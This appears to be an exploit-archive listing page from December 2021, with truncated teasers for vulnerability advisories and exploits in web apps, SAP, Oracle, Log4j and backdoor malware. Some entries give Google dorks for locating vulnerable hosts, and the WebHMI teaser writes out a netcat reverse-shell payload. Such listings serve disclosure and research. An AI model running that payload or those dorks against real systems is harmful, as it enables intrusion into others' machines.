Aver EVC300 Firmware 00.10.16.36 Hardcoded Secrets

Firmware for Aver EVC300 multipoint video conferencing system v00.10.16.36 and others as well as firmware for several other devices manufactured by Aver, potentially all multipoint video conferencing systems contains multiple advanced features that are not well documented: 1. The web admin server...

phpKF CMS 3.00 Beta y6 Remote Code Execution

Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution RCE Unauthenticated Date: 18/12/2021 Exploit Author: Halit AKAYDIN hLtAkydn Vendor Homepage: https://www.phpkf.com/ Software Link: https://www.phpkf.com/indirme.php Version: 3.00 Category: Webapps Tested on: Linux/Windows phpKF-CMS; It...

WBCE CMS 1.5.1 Admin Password Reset

Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset Google Dork: intext: "Way Better Content Editing" Date: 20/12/2021 Exploit Author: citril or https://github.com/maxway2021 Vendor Homepage: https://wbce.org/ Software Link: https://wbce.org/de/downloads/ Version: = 1.5.1 Tested on: Linux CVE :...

WordPress Popular Posts 5.3.2 Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Wordpress Popular Posts Authenticated RCE', 'Description' = %q This exploit requires Metasploit to have a FQDN and the ability to run a payload w...

Video Sharing Website 1.0 SQL Injection

Title: Video Sharing Website 1.0 SQL - Injection Author: nu11secur1ty Date: 12.18.2021 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html Description: The email parameter from ajax.php app o...

Signup PHP Portal 2.1 Shell Upload

-- Exploit Title: Signup Php Portal Arbitrary File Upload Google Dork: N/A Date: 19/12/2021 Exploit Author: Sohel Yousef - [email protected] Software Link: https://codecanyon.net/item/signup-php-portal/23066564 Software Demo :https://ocsolutions.co.in/signupcustomscript/customerregister.php...

Alfa Team Shell Tesla 4.1 Remote Code Execution

Exploit Title: ALFA TEAM SHELL TESLA 4.1 - 'cmd' Remote Code Execution Unauthenticated Google Dork: inurl:/alfacgiapi intext:alfa Date: 2021-12-19 Exploit Author: Aryan Chehreghani Vendor Homepage: http://solevisible.com Software Link: https://phpshells.com/alfa-tesla-v4-1-shell Version: v4.1...

Bazaar Web PHP Social Listings Shell Upload

-- Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload Google Dork: N/A Date: 19/12/2021 Exploit Author: Sohel Yousef - [email protected] Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913 Software Demo...

Backdoor.Win32.BNLite Buffer Overflow

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/9cec5a23887f0c73148ab3ea147a6fa4.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.BNLite Vulnerability: Remote Heap Based Buffer Overflow Description: The malware...

Backdoor.Win32.Mellpon.b Information Disclosure

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/e499a4c359a8cc46e641f39c0ed548f9.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Mellpon.b Vulnerability: Remote Unauthenticated Information Disclosure Description: T...

Croogo 3.0.2 Cross Site Scripting

Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting XSS Date: 06/12/2021 Exploit Author: Enes Özeser Vendor Homepage: https://croogo.org/ Software Link: https://downloads.croogo.org/v3.0.2.zip Version: 3.0.2 Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==...

Arunna 1.0.0 Cross Site Request Forgery

Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery CSRF Date: November 29, 2021 Exploit Author: =LL= Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ Vendor Homepage: https://github.com/arunna Software Link:...

Cibele Thinfinity VirtualUI 2.5.41.0 User Enumeration

Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration Date: 13/12/2021 Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed Vendor Homepage: https://www.cybelesoft.com Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ Version: vulnerable v3.0 Tested on:...

Croogo 3.0.2 Shell Upload

Exploit Title: Croogo 3.0.2 - Unrestricted File Upload Date: 06/12/2021 Exploit Author: Enes Özeser Vendor Homepage: https://croogo.org/ Software Link: https://downloads.croogo.org/v3.0.2.zip Version: 3.0.2 Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 == 'setting-43'...

Child's Day Care Management System 1.0 SQL Injection

Title: Child's Day Care Management System 1.0 SQL - Injection Author: nu11secur1ty Date: 12.16.2021 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html Description: The username in...

Oliver Library Server 5 Arbitrary File Download

Exploit Title: Oliver Library Server v5 - Arbitrary File Download Date: 14/12/2021 Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group Vendor Homepage: https://www.softlinkint.com/product/oliver/ Product: Oliver Server v5 Version: /oliver/FileServlet?source=serverFile&fileName= 2...

SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG SQL Injection

SEC Consult Vulnerability Lab Security Advisory ============================================================================== title: Remote ADBC SQL Injection in SAP IUUCRECONRCCOUNTTABLEBIG product: SAP Netweaver vulnerable version: see vulnerable/tested versions section below fixed version: se...

Simple Cold Storage Management System 1.0 SQL Injection

Title: Simple Cold Storage Management System 1.0 SQL - Injection Author: nu11secur1ty Date: 12.15.2021 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html Description: The id...

SAP Netweaver IUUC_GENERATE_ACPLAN_DELIMITER ABAP Code Injection

SEC Consult Vulnerability Lab Security Advisory ============================================================================== title: Remote ABAP Code Injection in IUUCGENERATEACPLANDELIMITER product: SAP Netweaver vulnerable version: SAP DMIS in at least 20111731 = SP 0013 fixed version: see...

OpenEMR 6.0.0 / 6.1.0-dev SQL Injection

Trovent Security Advisory 2109-01 Authenticated SQL injection in OpenEMR calendar search Overview Advisory ID: TRSA-2109-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2109-01 Affected product: OpenEMR web application Tested versions: 6.0.0,...

SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG ABAP Code Injection

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Remote ABAP Code Injection in SAP IUUCRECONRCCOUNTTABLEBIG product: SAP Netweaver vulnerable version: SAP DMIS 20111731 SP 0013 fixed version: see solution section below...

AbanteCart Arbitrary File Upload / Cross Site Scripting

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities product: AbanteCart e-commerce platform vulnerable version: 1.3.2 fixed version: 1.3.2 CVE number: CVE-2021-42050, CVE-2021-42051 impact: Medium...

Zucchetti Axess CLOKI Access Control 1.64 Cross Site Request Forgery

!-- Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control Vendor: Zucchetti Axess S.p.A. Product web page: https://www.axesstmc.com Affected version: 1.64 1.63 1.54 Summary: CLOKI is the pre-installed application on our terminals that provides simple to use access control manageme...

Laravel Valet 2.0.3 Privilege Escalation

Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation macOS Exploit Author: leonjza Vendor Homepage: https://laravel.com/docs/8.x/valet Version: v1.1.4 to v2.0.3 !/usr/bin/env python2 Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation macOS February 2017 - @leonjza Affected version...

Sofico Miles RIA 2020.2 Build 127964T Cross Site Scripting

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Stored Cross Site Scripting product: Sofico Miles RIA vulnerable version: 2020.2 build 127964T fixed version: 2020.2 build 128076 or higher CVE number: CVE-2021-41557...

meterN 1.2.3 Remote Command Execution

!-- meterN v1.2.3 Authenticated Remote Command Execution Vulnerability Vendor: Jean-Marc Louviaux Product web page: https://www.metern.org Affected version: 1.2.3 and 0.8.3.2 Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution. It accept any meters li...

Online Thesis Archiving System 1.0 SQL Injection / Cross Site Scripting

Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass & Stored XSS Exploit Author: Yehia Elghaly YME Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html...

Apache Log4j2 2.14.1 Remote Code Execution

Exploit Title: Apache Log4j 2 - Remote Code Execution RCE Date: 11/12/2021 Exploit Authors: kozmer, z9fr, svmorris Vendor Homepage: https://logging.apache.org/log4j/2.x/ Software Link: https://github.com/apache/logging-log4j2 Version: versions 2.0-beta-9 and 2.14.1. Tested on: Linux CVE:...

Ticket Booking 1.0 SQL Injection

Title: Ticket Booking 1.0 suffer from SQL - Injenction Author: nu11secur1ty Date: 12.14.2021 Vendor: https://code-projects.org/ticket-booking-in-php-with-source-code/ Software: https://code-projects.org/ticket-booking-in-php-with-source-code/ Description: The password parameter appears to be...

Apache Log4j2 2.14.1 Information Disclosure

Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure Date: 12/12/2021 Exploit Author: leonjza Vendor Homepage: https://logging.apache.org/log4j/2.x/ Version: None: printf' i| new connection from self.clientaddress0' sock = self.request sock.recv1024 sock.sendallLDAPHEADER data =...

Booked Scheduler 2.7.5 Shell Upload

Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution RCE Authenticated Vulnerability founder: AkkuS Date: 13/12/2021 Exploit Author: 0sunday Vendor Homepage: https://www.bookedscheduler.com/ Software Link: N/A Version: Booked Scheduler 2.7.5 Tester on: Kali 2021.2 CVE: CVE-2019-9581...

WordPress Typebot 1.4.3 Cross Site Scripting

Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting XSS Authenticated Date: 29/11/2021 Exploit Author: Mansi Singh Vendor Homepage: https://wordpress.org/plugins/typebot/ Software Link: https://wordpress.org/plugins/typebot/ Tested on Windows Reference:...

Backdoor.Win32.Ramus Code Execution

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/20cfe4912b280ad141d51f1f7370bfa5.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Ramus Vulnerability: Unauthenticated Remote Code Execution Description: The malware...

Backdoor.Win32.Ncx.b Code Execution

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/991c1f02c809cee860cb712896a45338.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Ncx.b Vulnerability: Unauthenticated Remote Command Execution Description: The malwar...

Backdoor.Win32.Phase.11 Code Execution

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/fb4fb710f031304d788d9cd1c4201552.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Phase.11 Vulnerability: Unauthenticated Remote Command Execution Description: The phA...

Backdoor.Win32.FTP.Matiteman Weak Hardcoded Password

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/fc8eaa2a5752b509dbd02989d8d9f2e2.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.FTP.Matiteman Vulnerability: Weak Hardcoded Password Description: The malware listens...

Backdoor.Win32.Jokerdoor Buffer Overflow

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/8f18703c433b5703a7131c1afeacfd74.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Jokerdoor Vulnerability: Remote Stack Buffer Overflow Description: The malware listen...

Backdoor.Win32.Nucleroot.mf Buffer Overflow

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Nucleroot.mf Vulnerability: Stack Buffer Overflow Description: Description: MaskPE by...

Backdoor.Win32.Mechbot.a Insecure Permissions

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/8c9e7906d0ad5d0f2267be0057f2a8e3.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Mechbot.a Vulnerability: Insecure Permissions Description: The malware creates a dir...

Backdoor.Win32.BackAttack.20 Authentication Bypass / Code Execution

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2B.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.BackAttack.20 Vulnerability: Authentication Bypass RCE Description: BackAtTack 2.0 B...

HD-Network Real-Time Monitoring System 2.0 Local File Inclusion

Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion LFI Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0" Date: 11/12/2021 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: N/A Version: V2.0 Tested on: Nginx NVRDVRIPC Web Server Proof of...

Oracle Database Protection Mechanism Bypass

Advisory ID: SYSS-2021-061 Product: Database Manufacturer: Oracle Affected Versions: 12.1.0.2, 12.2.0.1, 19c Tested Versions: 18c Vulnerability Type: Protection Mechanism Failure CWE-693 Risk Level: High Solution Status: Fixed Manufacturer Notification: 2021-03-17 Solution Date: 2021-08-07 Public...

Backdoor.Win32.BackAttack.20 Code Execution

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.BackAttack.20 Vulnerability: Unauthenticated Remote Command Execution Description:...

Backdoor.Win32.Asylum.014 Insecure Password Storage

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/a83989d36f3b443a757eef1c99f1a373.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Asylum.014 Vulnerability: Cleartext Password Storage Description: Asylum v0.1.4...

Backdoor.IRC.Subhuman Unauthenticated Open Proxy

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/f93e64ac9c3383d0df23662a78a76c07.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.IRC.Subhuman Vulnerability: Unauthenticated Open Proxy Description: The malware listens on...

WebHMI 4.0 Remote Code Execution

Exploit Title: WebHMI 4.0 - Remote Code Execution RCE Authenticated Date: 12/12/2021 Exploit Author: Jeremiasz Pluta Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI Firmware """ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2%261|nc+""" + localhost + """+""" +...

Simple Forum-Discussion System 1.0 SQL Injection

Simple Forum-Discussion System 1.0 Vendor Description: Multiple SQL-Injections are found on Simple Forum-Discussion System 1.0 For example on three applications which are managetopic.php, manageuser.php, and ajax.php. The attacker can be retrieving all information from the database of this system...

Oracle Database Weak NNE Integrity Key Derivation

Advisory ID: SYSS-2021-062 Product: Database Manufacturer: Oracle Affected Versions: 12.1.0.2, 12.2.0.1, 19c Tested Versions: 18c Vulnerability Type: Inadequate Encryption Strength CWE-326 Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2021-03-17 Solution Date: 2021-08-07...

Backdoor.Win32.Ncx.b Buffer Overflow

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/991c1f02c809cee860cb712896a45338B.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Ncx.b Vulnerability: Remote Stack Buffer Overflow Description: The malware listens o...

Free School Management Software 1.0 Shell Upload

Exploit Title: Free School Management Software 1.0 - Remote Code Execution RCE Exploit Author: fuuzap1 Date: 7-12-2021 Category: Web application Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html Software Link:...